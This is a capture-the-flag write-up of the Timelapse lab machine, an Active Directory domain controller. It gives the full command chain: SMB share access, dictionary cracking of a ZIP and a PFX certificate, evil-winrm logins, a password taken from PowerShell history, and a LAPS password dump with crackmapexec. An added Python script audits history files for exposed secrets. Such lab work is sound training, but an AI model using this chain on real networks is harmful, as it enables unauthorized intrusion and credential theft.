Timelapse
- OS: Windows
- Difficulty: Easy
- IP Address: 10.10.11.152
- Release: 26 / 03 / 2022
Port scanning
# Nmap 7.92 scan initiated as: nmap -sC -sV -o nmap/targeted 10.10.11.152 -p 53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49692,53215
Nmap scan report for 10.10.11.152
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-28 00:13:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
|_ssl-date: 2022-03-28T00:15:13+00:00; +8h18m23s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
53215/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-28T00:14:36
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 8h18m22s, deviation: 0s, median: 8h18m22s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 100.14 seconds
This machine has ports 53 (DNS), 88 (Kerberos), 135 (MS-RPC), 389 (LDAP), 445 (SMB) and 5986 (WinRM over HTTPS) open, among others.
$ crackmapexec smb 10.10.11.152
SMB 10.10.11.152 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
Moreover, we see that the machine is a domain controller (DC) of an Active Directory (AD) environment. We can start by adding timelapse.htb to /etc/hosts.
SMB enumeration
We can start looking at SMB using a null session:
$ smbclient -L 10.10.11.152 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
We see that there is a share called Shares. We can connect to it and list some folders:
$ smbclient //10.10.11.152/Shares -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Oct 25 10:39:15 2021
.. D 0 Mon Oct 25 10:39:15 2021
Dev D 0 Mon Oct 25 14:40:06 2021
HelpDesk D 0 Mon Oct 25 10:48:42 2021
6367231 blocks of size 4096. 2285718 blocks available
smb: \> cd Dev
smb: \Dev\> dir
. D 0 Mon Oct 25 14:40:06 2021
.. D 0 Mon Oct 25 14:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 10:46:42 2021
6367231 blocks of size 4096. 2285702 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (8.4 KiloBytes/sec) (average 8.4 KiloBytes/sec)
smb: \Dev\> cd ..\HelpDesk\
smb: \HelpDesk\> dir
. D 0 Mon Oct 25 10:48:42 2021
.. D 0 Mon Oct 25 10:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 09:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 09:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 09:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 09:57:44 2021
6367231 blocks of size 4096. 2285718 blocks available
smb: \HelpDesk\> mget *
Get file LAPS.x64.msi? y
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as LAPS.x64.msi (545.5 KiloBytes/sec) (average 475.1 KiloBytes/sec)
Get file LAPS_Datasheet.docx? y
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as LAPS_Datasheet.docx (265.6 KiloBytes/sec) (average 445.1 KiloBytes/sec)
Get file LAPS_OperationsGuide.docx? y
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as LAPS_OperationsGuide.docx (654.5 KiloBytes/sec) (average 500.1 KiloBytes/sec)
Get file LAPS_TechnicalSpecification.docx? y
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as LAPS_TechnicalSpecification.docx (176.6 KiloBytes/sec) (average 468.0 KiloBytes/sec)
smb: \HelpDesk\> exit
We have downloaded all these files:
winrm_backup.zip
LAPS.x64.msi
LAPS_Datasheet.docx
LAPS_OperationsGuide.docx
LAPS_TechnicalSpecification.docx
Cracking files
The ZIP archive is password-protected:
$ unzip -l winrm_backup.zip
Archive: winrm_backup.zip
Length Date Time Name
--------- ---------- ----- ----
2555 2021-10-25 09:21 legacyy_dev_auth.pfx
--------- -------
2555 1 file
$ unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
We can use fcrackzip to find the password with a dictionary attack:
$ fcrackzip -uDp $WORDLISTS/rockyou.txt winrm_backup.zip
PASSWORD FOUND!!!!: pw == supremelegacy
$ unzip -P supremelegacy winrm_backup.zip
Archive: winrm_backup.zip
inflating: legacyy_dev_auth.pfx
The ZIP file stores a PFX (PKCS#12) file, which bundles a client certificate and its private key for authenticating to WinRM. Notice that the open port is 5986, not 5985 as usual: 5986 is WinRM over HTTPS, and this endpoint accepts certificate-based authentication, so we need the certificate and the private key in order to connect.
We can extract them using openssl:
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out priv-key.pem
Enter Import Password:
Can't read Password
But we need another password, because supremelegacy does not work.
I found a tool called crackpkcs12 to run a dictionary attack against the PFX password:
$ ./crackpkcs12 -d $WORDLISTS/rockyou.txt legacyy_dev_auth.pfx
Dictionary attack - Starting 1 threads
*********************************************************
Dictionary attack - Thread 1 - Password found: thuglegacy
*********************************************************
We get another password; now we can extract the private key and the certificate:
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out priv-key.pem
Enter Import Password:
MAC verified OK
$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out pub-key.pem
Enter Import Password:
MAC verified OK
Now we can use evil-winrm to connect to the machine (no username or password is needed, because the certificate identifies the user):
$ evil-winrm -i 10.10.11.152 --ssl -k priv-key.pem -c pub-key.pem
Evil-WinRM shell v3.3
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> type ..\Desktop\user.txt
76a99a6d71f58a99a2844eb3b48334e3
And there we have the user.txt flag.
System enumeration
Let’s enumerate some users:
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ..\..
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX
*Evil-WinRM* PS C:\Users> net user legacyy
User name legacyy
Full Name Legacyy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/23/2021 12:17:10 PM
Password expires Never
Password changeable 10/24/2021 12:17:10 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/28/2022 5:10:20 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users *Development
The command completed successfully.
*Evil-WinRM* PS C:\Users> net user svc_deploy
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 12:12:37 PM
Password expires Never
Password changeable 10/26/2021 12:12:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/28/2022 1:16:01 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users> net user TRX
User name TRX
Full Name TRX
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2022 6:43:45 PM
Password expires Never
Password changeable 2/24/2022 6:43:45 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/27/2022 10:29:10 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *Domain Admins
The command completed successfully.
We see that svc_deploy belongs to LAPS_Readers and TRX belongs to Domain Admins.
LAPS is the acronym for Local Administrator Password Solution, which generates random passwords for the local Administrator account of domain-joined machines and stores them in Active Directory, readable only by authorized principals (the Word documents found before provide enough information). If we can log in as svc_deploy, a member of LAPS_Readers, we will be able to read the password managed by LAPS.
After some enumeration, we discover that legacyy has a PowerShell history file with useful commands:
*Evil-WinRM* PS C:\Users\legacyy\Documents> dir C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
Directory: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/3/2022 11:46 PM 434 ConsoleHost_history.txt
*Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
There we have the password for svc_deploy. Now we can execute commands as svc_deploy using script blocks:
*Evil-WinRM* PS C:\Users\legacyy\Documents> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
*Evil-WinRM* PS C:\Users\legacyy\Documents> $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\legacyy\Documents> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
*Evil-WinRM* PS C:\Users\legacyy\Documents> Invoke-Command -ComputerName localhost -Credential $c -Port 5986 -usessl -SessionOption $so -ScriptBlock { whoami }
timelapse\svc_deploy
We can even connect to the machine as svc_deploy using evil-winrm:
$ evil-winrm -i 10.10.11.152 --ssl -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'
Evil-WinRM shell v3.3
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
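The pivot above came from a credential left in a PSReadline history file. As an added defender-side check (example code, not from the original writeup), this Python script scans ConsoleHost_history.txt for the three risky patterns seen in that history: a plaintext ConvertTo-SecureString, a PSCredential built from a literal user name, and session options that disable TLS validation. The sample history is constructed with a placeholder secret, and the profile path layout assumes the standard Windows C:\Users\<name>\AppData\Roaming location.

```python
import glob
import os
import re

# Constructed sample with the same shape as the PSReadline history in the writeup;
# the secret is a placeholder, not the real one.
SAMPLE_HISTORY = """whoami
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Sample-Pa55word!' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
exit
"""

# One regex per risky pattern: plaintext secret, literal credential object, TLS checks off.
RULES = {
    "plaintext_secure_string": re.compile(
        r"ConvertTo-SecureString\s+(['\"])(?P<secret>.+?)\1\s+-AsPlainText", re.I),
    "pscredential_literal": re.compile(
        r"PSCredential\s*\(\s*['\"](?P<user>[^'\"]+)['\"]", re.I),
    "tls_checks_disabled": re.compile(r"-Skip(?:CA|CN|Revocation)Check", re.I),
}

def scan_history(text):
    """Return one finding per matching line; the secret itself is masked, never echoed."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, rx in RULES.items():
            m = rx.search(line)
            if not m:
                continue
            if rule == "plaintext_secure_string":
                s = m.group("secret")
                detail = f"secret of length {len(s)} starting {s[:2]}***"
            elif rule == "pscredential_literal":
                detail = f"credential object built for user {m.group('user')}"
            else:
                detail = line.strip()
            findings.append({"line": lineno, "rule": rule, "detail": detail})
    return findings

def history_files(users_root):
    """PSReadline history paths under every profile in users_root (Windows layout assumed)."""
    return sorted(glob.glob(os.path.join(users_root, "*", "AppData", "Roaming", "Microsoft",
                                         "Windows", "PowerShell", "PSReadline", "ConsoleHost_history.txt")))

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f['line']}: {f['rule']}: {f['detail']}")
```

On a real host, feed each path from history_files(r"C:\Users") to scan_history to audit every profile; findings report the line and a masked hint, never the secret.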
Privilege escalation
But the most important thing is that we can retrieve the LAPS-managed Administrator password for the DC using crackmapexec:
$ crackmapexec ldap 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -M laps
LDAP 10.10.11.152 389 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.152 389 DC01 [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
LAPS 10.10.11.152 389 DC01 [*] Getting LAPS Passwords
LAPS 10.10.11.152 389 DC01 Computer: DC01$ Password: h!0yj-1WI(YlDIz+2Il@w1/(
Now we have access as Administrator:
$ evil-winrm -i 10.10.11.152 --ssl -u Administrator -p 'h!0yj-1WI(YlDIz+2Il@w1/('
Evil-WinRM shell v3.3
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
Cannot find path 'C:\Users\Administrator\Desktop\root.txt' because it does not exist.
At line:1 char:1
+ type ..\Desktop\root.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
But where is root.txt? Well, let’s search for it:
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ChildItem root.txt -Path C:\Users\ -Recurse
Directory: C:\Users\TRX\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/28/2022 6:16 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\TRX\Desktop\root.txt
1505bebfda29707adf43cf8530421b35